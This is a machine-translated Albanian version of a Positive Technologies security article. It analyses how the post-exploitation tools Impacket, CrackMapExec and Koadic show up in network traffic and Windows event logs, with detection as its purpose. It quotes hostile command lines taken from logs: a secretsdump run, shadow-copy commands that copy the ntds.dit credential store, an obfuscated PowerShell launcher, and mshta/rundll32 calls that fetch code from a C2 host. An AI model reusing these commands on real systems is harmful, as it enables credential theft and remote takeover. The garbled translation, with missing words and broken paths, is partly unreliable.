Numri i sulmeve në sektorin e korporatave po rritet çdo vit: për shembull se në vitin 2016, dhe në fund të 2018 - se në periudhën e mëparshme. Përfshirë ato ku mjeti kryesor i punës është sistemi operativ Windows. Në 2017-2018, APT Dragonfly, APT28, ka kryer sulme ndaj organizatave qeveritare dhe ushtarake në Evropë, Amerikën e Veriut dhe Arabinë Saudite. Dhe ne përdorëm tre mjete për këtë - , и . Kodi i tyre burimor është i hapur dhe i disponueshëm në GitHub.
Vlen të theksohet se këto mjete nuk përdoren për depërtim fillestar, por për të zhvilluar një sulm brenda infrastrukturës. Sulmuesit i përdorin ato në faza të ndryshme të sulmit pas depërtimit të perimetrit. Kjo, nga rruga, është e vështirë për t'u zbuluar dhe shpesh vetëm me ndihmën e teknologjisë ose mjetet që lejojnë . Mjetet ofrojnë një sërë funksionesh, nga transferimi i skedarëve te ndërveprimi me regjistrin dhe ekzekutimi i komandave në një makinë të largët. Ne kryem një studim të këtyre mjeteve për të përcaktuar aktivitetin e tyre të rrjetit.
Çfarë duhej të bënim:
- Kuptoni se si funksionojnë mjetet e hakerimit. Zbuloni se çfarë duhet të shfrytëzojnë sulmuesit dhe cilat teknologji mund të përdorin.
- Gjeni atë që nuk zbulohet nga mjetet e sigurisë së informacionit në fazat e para të një sulmi. Faza e zbulimit mund të anashkalohet, ose sepse sulmuesi është një sulmues i brendshëm, ose sepse sulmuesi po shfrytëzon një vrimë në infrastrukturë që nuk dihej më parë. Bëhet e mundur të rivendoset i gjithë zinxhiri i veprimeve të tij, pra dëshira për të zbuluar lëvizje të mëtejshme.
- Eliminoni rezultatet false nga mjetet e zbulimit të ndërhyrjeve. Nuk duhet të harrojmë se kur veprime të caktuara zbulohen vetëm në bazë të zbulimit, gabimet e shpeshta janë të mundshme. Zakonisht në infrastrukturë ka një numër të mjaftueshëm mënyrash, të padallueshme nga ato të ligjshmet në shikim të parë, për të marrë çdo informacion.
Çfarë u japin këto mjete sulmuesve? Nëse kjo është Impacket, atëherë sulmuesit marrin një bibliotekë të madhe modulesh që mund të përdoren në faza të ndryshme të sulmit që pasojnë pas thyerjes së perimetrit. Shumë mjete përdorin modulet Impacket brenda - për shembull, Metasploit. Ai ka dcomexec dhe wmiexec për ekzekutimin e komandës në distancë, Secretsdump për marrjen e llogarive nga memorja që janë shtuar nga Impacket. Si rezultat, zbulimi i saktë i aktivitetit të një biblioteke të tillë do të sigurojë zbulimin e derivateve.
Nuk është rastësi që krijuesit shkruan "Powered by Impacket" për CrackMapExec (ose thjesht CME). Për më tepër, CME ka funksionalitet të gatshëm për skenarë të njohur: Mimikatz për marrjen e fjalëkalimeve ose hash-eve të tyre, zbatimin e agjentit Meterpreter ose Empire për ekzekutim në distancë dhe Bloodhound në bord.
Mjeti i tretë që zgjodhëm ishte Koadic. Është mjaft i fundit, u prezantua në konferencën ndërkombëtare të hakerëve DEFCON 25 në 2017 dhe dallohet nga një qasje jo standarde: funksionon përmes HTTP, Java Script dhe Microsoft Visual Basic Script (VBS). Kjo qasje quhet të jetuarit jashtë tokës: mjeti përdor një grup varësish dhe bibliotekash të integruara në Windows. Krijuesit e quajnë atë COM Command & Control, ose C3.
IMPACKET
Funksionaliteti i Impacket është shumë i gjerë, duke filluar nga zbulimi brenda AD dhe mbledhja e të dhënave nga serverët e brendshëm MS SQL, tek teknikat për marrjen e kredencialeve: ky është një sulm rele SMB dhe marrja e skedarit ntds.dit që përmban hash të fjalëkalimeve të përdoruesit nga një kontrollues domeni. Impacket gjithashtu ekzekuton komanda nga distanca duke përdorur katër metoda të ndryshme: WMI, Windows Scheduler Management Service, DCOM dhe SMB dhe kërkon kredenciale për ta bërë këtë.
Sekreti
Le të hedhim një vështrim në Secretsdump. Ky është një modul që mund të synojë si makinat e përdoruesve ashtu edhe kontrolluesit e domenit. Mund të përdoret për të marrë kopje të zonave të kujtesës LSA, SAM, SECURITY, NTDS.dit, kështu që mund të shihet në faza të ndryshme të sulmit. Hapi i parë në funksionimin e modulit është vërtetimi nëpërmjet SMB, i cili kërkon ose fjalëkalimin e përdoruesit ose hash-in e tij për të kryer automatikisht sulmin Pass the Hash. Më pas vjen një kërkesë për të hapur aksesin te Menaxheri i Kontrollit të Shërbimit (SCM) dhe për të fituar akses në regjistër nëpërmjet protokollit winreg, duke përdorur të cilin një sulmues mund të zbulojë të dhënat e degëve të interesit dhe të marrë rezultate përmes SMB.
Në Fig. 1 ne shohim se si saktësisht kur përdorni protokollin winreg, qasja merret duke përdorur një çelës regjistri me një LSA. Për ta bërë këtë, përdorni komandën DCERPC me kodin optik 15 - OpenKey.
Oriz. 1. Hapja e një çelësi regjistri duke përdorur protokollin winreg
Më pas, kur arrihet qasja në çelës, vlerat ruhen me komandën SaveKey me kodin optik 20. Impacket e bën këtë në një mënyrë shumë specifike. Ai i ruan vlerat në një skedar emri i të cilit është një varg prej 8 karakteresh të rastësishme të bashkangjitura me .tmp. Përveç kësaj, ngarkimi i mëtejshëm i këtij skedari ndodh nëpërmjet SMB nga direktoria System32 (Fig. 2).
Oriz. 2. Skema për marrjen e një çelësi regjistri nga një makinë në distancë
Rezulton se një aktivitet i tillë në rrjet mund të zbulohet nga pyetjet në degë të caktuara të regjistrit duke përdorur protokollin winreg, emrat specifikë, komandat dhe renditjen e tyre.
Ky modul gjithashtu lë gjurmë në regjistrin e ngjarjeve të Windows, duke e bërë të lehtë zbulimin. Për shembull, si rezultat i ekzekutimit të komandës
secretsdump.py -debug -system SYSTEM -sam SAM -ntds NTDS -security SECURITY -bootkey BOOTKEY -outputfile 1.txt -use-vss -exec-method mmcexec -user-status -dc-ip 192.168.202.100 -target-ip 192.168.202.100 contoso/Administrator:@DCNë regjistrin e Windows Server 2016 ne do të shohim sekuencën kryesore të ngjarjeve:
1. 4624 - Logon në distancë.
2. 5145 - kontrollimi i të drejtave të aksesit në shërbimin e largët të winreg.
3. 5145 - kontrollimi i të drejtave të aksesit të skedarëve në drejtorinë System32. Skedari ka emrin e rastësishëm të përmendur më sipër.
4. 4688 - krijimi i një procesi cmd.exe që nis vssadmin:
“C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin list shadows ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat5. 4688 - krijimi i një procesi me komandën:
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin create shadow /For=C: ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat6. 4688 - krijimi i një procesi me komandën:
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C copy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy3WindowsNTDSntds.dit %SYSTEMROOT%TemprmumAfcn.tmp ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat7. 4688 - krijimi i një procesi me komandën:
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin delete shadows /For=C: /Quiet ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.batSmbexec
Ashtu si shumë mjete pas shfrytëzimit, Impacket ka module për ekzekutimin e komandave nga distanca. Ne do të përqendrohemi në smbexec, i cili ofron një guaskë komanduese ndërvepruese në një makinë të largët. Ky modul gjithashtu kërkon vërtetim nëpërmjet SMB, qoftë me një fjalëkalim ose një hash të fjalëkalimit. Në Fig. Në figurën 3 shohim një shembull se si funksionon një mjet i tillë, në këtë rast është konsola e administratorit lokal.
Oriz. 3. Konsolë interaktive smbexec
Hapi i parë i smbexec pas vërtetimit është hapja e SCM me komandën OpenSCManagerW (15). Pyetja është e dukshme: fusha Emri i Machine është DUMMY.
Oriz. 4. Kërkesë për të hapur Service Control Manager
Më pas, shërbimi krijohet duke përdorur komandën CreateServiceW (12). Në rastin e smbexec, ne mund të shohim të njëjtën logjikë të ndërtimit të komandës çdo herë. Në Fig. 5 jeshile tregon parametrat e pandryshueshëm të komandës, e verdha tregon atë që një sulmues mund të ndryshojë. Është e lehtë të shihet se emri i skedarit të ekzekutueshëm, drejtoria e tij dhe skedari i daljes mund të ndryshohen, por pjesa tjetër është shumë më e vështirë për t'u ndryshuar pa prishur logjikën e modulit Impacket.
Oriz. 5. Kërkoni për të krijuar një shërbim duke përdorur Service Control Manager
Smbexec gjithashtu lë gjurmë të dukshme në regjistrin e ngjarjeve të Windows. Në regjistrin e Windows Server 2016 për guaskën e komandës ndërvepruese me komandën ipconfig, do të shohim sekuencën kryesore të mëposhtme të ngjarjeve:
1. 4697 — instalimi i shërbimit në makinën e viktimës:
%COMSPEC% /Q /c echo cd ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
2. 4688 - krijimi i procesit cmd.exe me argumentet nga pika 1.
3. 5145 - kontrollimi i të drejtave të hyrjes në skedarin __output në drejtorinë C$.
4. 4697 — instalimi i shërbimit në makinën e viktimës.
%COMSPEC% /Q /c echo ipconfig ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
5. 4688 - krijimi i procesit cmd.exe me argumentet nga pika 4.
6. 5145 - kontrollimi i të drejtave të hyrjes në skedarin __output në drejtorinë C$.
Impacket është baza për zhvillimin e mjeteve të sulmit. Ai mbështet pothuajse të gjitha protokollet në infrastrukturën e Windows dhe në të njëjtën kohë ka veçoritë e veta karakteristike. Këtu janë kërkesat specifike të winreg dhe përdorimi i SCM API me formimin karakteristik të komandës, dhe formati i emrit të skedarit dhe SMB share SYSTEM32.
CRACKMAPEXEC
Mjeti CME është krijuar kryesisht për të automatizuar ato veprime rutinë që duhet të kryejë një sulmues për të avancuar brenda rrjetit. Kjo ju lejon të punoni në bashkëpunim me agjentin dhe Meterpreterin e njohur të Empire. Për të ekzekutuar komandat në mënyrë të fshehtë, CME mund t'i turbullojë ato. Duke përdorur Bloodhound (një mjet i veçantë zbulimi), një sulmues mund të automatizojë kërkimin për një seancë aktive të administratorit të domenit.
Brez gjaku
Bloodhound, si një mjet i pavarur, lejon zbulimin e avancuar brenda rrjetit. Ai mbledh të dhëna për përdoruesit, makinat, grupet, seancat dhe ofrohet si një skript PowerShell ose skedar binar. Protokollet e bazuara në LDAP ose SMB përdoren për të mbledhur informacion. Moduli i integrimit CME lejon që Bloodhound të shkarkohet në makinën e viktimës, të ekzekutojë dhe të marrë të dhënat e mbledhura pas ekzekutimit, duke automatizuar veprimet në sistem dhe duke i bërë ato më pak të dukshme. Predha grafike Bloodhound paraqet të dhënat e mbledhura në formën e grafikëve, të cilat ju lejojnë të gjeni rrugën më të shkurtër nga makina e sulmuesit te administratori i domenit.
Oriz. 6. Ndërfaqja Bloodhound
Për të ekzekutuar në makinën e viktimës, moduli krijon një detyrë duke përdorur ATSVC dhe SMB. ATSVC është një ndërfaqe për të punuar me programuesin e detyrave të Windows. CME përdor funksionin e tij NetrJobAdd(1) për të krijuar detyra në rrjet. Një shembull i asaj që dërgon moduli CME është paraqitur në Fig. 7: Kjo është një thirrje komanduese cmd.exe dhe kod i turbullt në formën e argumenteve në formatin XML.
Fig.7. Krijimi i një detyre përmes CME
Pasi detyra të jetë dorëzuar për ekzekutim, makina e viktimës ndez vetë Bloodhound, dhe kjo mund të shihet në trafik. Moduli karakterizohet nga pyetje LDAP për të marrë grupe standarde, një listë të të gjitha makinerive dhe përdoruesve në domen dhe për të marrë informacion rreth sesioneve aktive të përdoruesve përmes kërkesës SRVSVC NetSessEnum.
Oriz. 8. Marrja e një liste të sesioneve aktive nëpërmjet SMB
Për më tepër, lëshimi i Bloodhound në makinën e viktimës me auditim të aktivizuar shoqërohet nga një ngjarje me ID 4688 (krijimi i procesit) dhe emri i procesit «C:WindowsSystem32cmd.exe». Ajo që është e dukshme në lidhje me të janë argumentet e linjës së komandës:
cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & ( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](91 , 78, 101,116 , 46, 83 , 101 , … , 40,41 )-jOIN'' ) "Enum_avproducts
Moduli enum_avproducts është shumë interesant nga pikëpamja e funksionalitetit dhe zbatimit. WMI ju lejon të përdorni gjuhën e pyetjeve WQL për të tërhequr të dhëna nga objekte të ndryshme të Windows, gjë që është në thelb ajo që përdor ky modul CME. Ai gjeneron pyetje për klasat AntiSpywareProduct dhe AntiМirusProduct në lidhje me mjetet e mbrojtjes të instaluara në makinën e viktimës. Për të marrë të dhënat e nevojshme, moduli lidhet me hapësirën e emrave rootSecurityCenter2, më pas gjeneron një pyetje WQL dhe merr një përgjigje. Në Fig. Figura 9 tregon përmbajtjen e kërkesave dhe përgjigjeve të tilla. Në shembullin tonë, u gjet Windows Defender.
Oriz. 9. Aktiviteti i rrjetit të modulit enum_avproducts
Shpesh, auditimi WMI (Trace WMI-Activity), në ngjarjet e të cilit mund të gjeni informacione të dobishme rreth pyetjeve të WQL, mund të çaktivizohet. Por nëse aktivizohet, atëherë nëse ekzekutohet skripti enum_avproducts, do të ruhet një ngjarje me ID 11. Ajo do të përmbajë emrin e përdoruesit që dërgoi kërkesën dhe emrin në hapësirën e emrave rootSecurityCenter2.
Secili prej moduleve CME kishte artefaktet e veta, qofshin pyetje specifike WQL ose krijimi i një lloji të caktuar detyre në një planifikues detyrash me turbullim dhe aktivitet specifik të Bloodhound në LDAP dhe SMB.
KOADIC
Një tipar dallues i Koadic është përdorimi i interpretuesve JavaScript dhe VBScript të integruara në Windows. Në këtë kuptim, ai ndjek trendin e jetesës jashtë tokës - domethënë, nuk ka varësi të jashtme dhe përdor mjete standarde të Windows. Ky është një mjet për komandim dhe kontroll të plotë (CnC), pasi pas infektimit vendoset një "implant" në makinë, duke e lejuar atë të kontrollohet. Një makinë e tillë, në terminologjinë Koadike, quhet "zombie". Nëse nuk ka privilegje të mjaftueshme për funksionimin e plotë nga ana e viktimës, Koadic ka aftësinë t'i ngrejë ato duke përdorur teknikat e anashkalimit të kontrollit të llogarisë së përdoruesit (UAC bypass).
Oriz. 10. Koadic Shell
Viktima duhet të fillojë komunikimin me serverin Command & Control. Për ta bërë këtë, ajo duhet të kontaktojë një URI të përgatitur më parë dhe të marrë trupin kryesor Koadic duke përdorur një nga skenarët. Në Fig. Figura 11 tregon një shembull për skedrën mshta.
Oriz. 11. Inicializimi i një sesioni me serverin CnC
Bazuar në variablin e përgjigjes WS, bëhet e qartë se ekzekutimi ndodh përmes WScript.Shell, dhe variablat STAGER, SESSIONKEY, JOBKEY, JOBKEYPATH, EXPIRE përmbajnë informacion kyç për parametrat e sesionit aktual. Ky është çifti i parë kërkesë-përgjigje në një lidhje HTTP me një server CnC. Kërkesat e mëvonshme lidhen drejtpërdrejt me funksionalitetin e moduleve të thirrura (implantet). Të gjitha modulet Koadic punojnë vetëm me një seancë aktive me CnC.
Mimikatz
Ashtu si CME punon me Bloodhound, Koadic punon me Mimikatz si një program më vete dhe ka mënyra të shumta për ta nisur atë. Më poshtë është një çift kërkesë-përgjigje për shkarkimin e implantit Mimikatz.
Oriz. 12. Transferimi i Mimikatz në Koadic
Mund të shihni se si ka ndryshuar formati URI në kërkesë. Tani përmban një vlerë për ndryshoren csrf, e cila është përgjegjëse për modulin e zgjedhur. Mos i kushtoni vëmendje emrit të saj; Të gjithë e dimë se CSRF zakonisht kuptohet ndryshe. Përgjigja ishte e njëjta pjesë kryesore e Koadic, së cilës iu shtua kodi i lidhur me Mimikatz. Është mjaft i madh, kështu që le të shohim pikat kryesore. Këtu kemi bibliotekën Mimikatz të koduar në base64, një klasë .NET të serializuar që do ta injektojë atë dhe argumente për të nisur Mimikatz. Rezultati i ekzekutimit transmetohet përmes rrjetit në tekst të qartë.
Oriz. 13. Rezultati i drejtimit të Mimikatz në një makinë të largët
Exec_cmd
Koadic gjithashtu ka module që mund të ekzekutojnë komanda nga distanca. Këtu do të shohim të njëjtën metodë të gjenerimit të URI dhe variablat e njohura sid dhe csrf. Në rastin e modulit exec_cmd, kodi i shtohet trupit që është në gjendje të ekzekutojë komandat e shell. Më poshtë tregohet një kod i tillë që gjendet në përgjigjen HTTP të serverit CnC.
Oriz. 14. Kodi i implantit exec_cmd
Për ekzekutimin e kodit kërkohet ndryshorja GAWTUUGCFI me atributin e njohur WS. Me ndihmën e tij, implanti thërret guaskën, duke përpunuar dy degë të kodit - shell.exec me kthimin e rrjedhës së të dhënave dalëse dhe shell.run pa kthim.
Koadic nuk është një mjet tipik, por ka artefaktet e veta me anë të të cilave mund të gjendet në trafikun legjitim:
- formimi i veçantë i kërkesave HTTP,
- duke përdorur winHttpRequests API,
- duke krijuar një objekt WScript.Shell nëpërmjet ActiveXObject,
- trup i madh i ekzekutueshëm.
Lidhja fillestare inicohet nga skederi, kështu që është e mundur të zbulohet aktiviteti i tij përmes ngjarjeve të Windows. Për mshta, kjo është ngjarja 4688, e cila tregon krijimin e një procesi me atributin start:
C:Windowssystem32mshta.exe http://192.168.211.1:9999/dXpT6Ndërsa Koadic po ekzekutohet, ju mund të shihni 4688 ngjarje të tjera me atribute që e karakterizojnë në mënyrë të përsosur:
rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c; csrf=;......mshtml,RunHTMLApplication
rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983;......mshtml,RunHTMLApplication
"C:Windowssystem32cmd.exe" /q /c chcp 437 & net session 1> C:Usersuser02AppDataLocalTemp6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1
"C:Windowssystem32cmd.exe" /q /c chcp 437 & ipconfig 1> C:Usersuser02AppDataLocalTemp721d2d0a-890f-9549-96bd-875a495689b7.txt 2>&1Gjetjet
Trendi i të jetuarit nga toka po fiton popullaritet në mesin e kriminelëve. Ata përdorin mjetet dhe mekanizmat e integruar në Windows për nevojat e tyre. Ne po shohim që mjetet e njohura Koadic, CrackMapExec dhe Impacket që ndjekin këtë parim shfaqen gjithnjë e më shumë në raportet e APT. Numri i pirunëve në GitHub për këto mjete po rritet gjithashtu, dhe po shfaqen të reja (tashmë ka rreth një mijë prej tyre). Trendi po fiton popullaritet për shkak të thjeshtësisë së tij: sulmuesit nuk kanë nevojë për mjete të palëve të treta; ata janë tashmë në makinat e viktimave dhe i ndihmojnë ata të anashkalojnë masat e sigurisë. Ne fokusohemi në studimin e komunikimit në rrjet: çdo mjet i përshkruar më sipër lë gjurmët e veta në trafikun e rrjetit; studimi i detajuar i tyre na lejoi të mësojmë produktin tonë zbulimin e tyre, gjë që në fund të fundit ndihmon për të hetuar të gjithë zinxhirin e incidenteve kibernetike që përfshijnë ato.
Autorët:
- Anton Tyurin, Shef i Departamentit të Shërbimeve të Ekspertëve, Qendra e Sigurisë së Ekspertëve PT, Teknologjitë Pozitive
- Egor Podmokov, ekspert, Qendra e Ekspertëve të Sigurisë PT, Teknologjitë Pozitive
Burimi: www.habr.com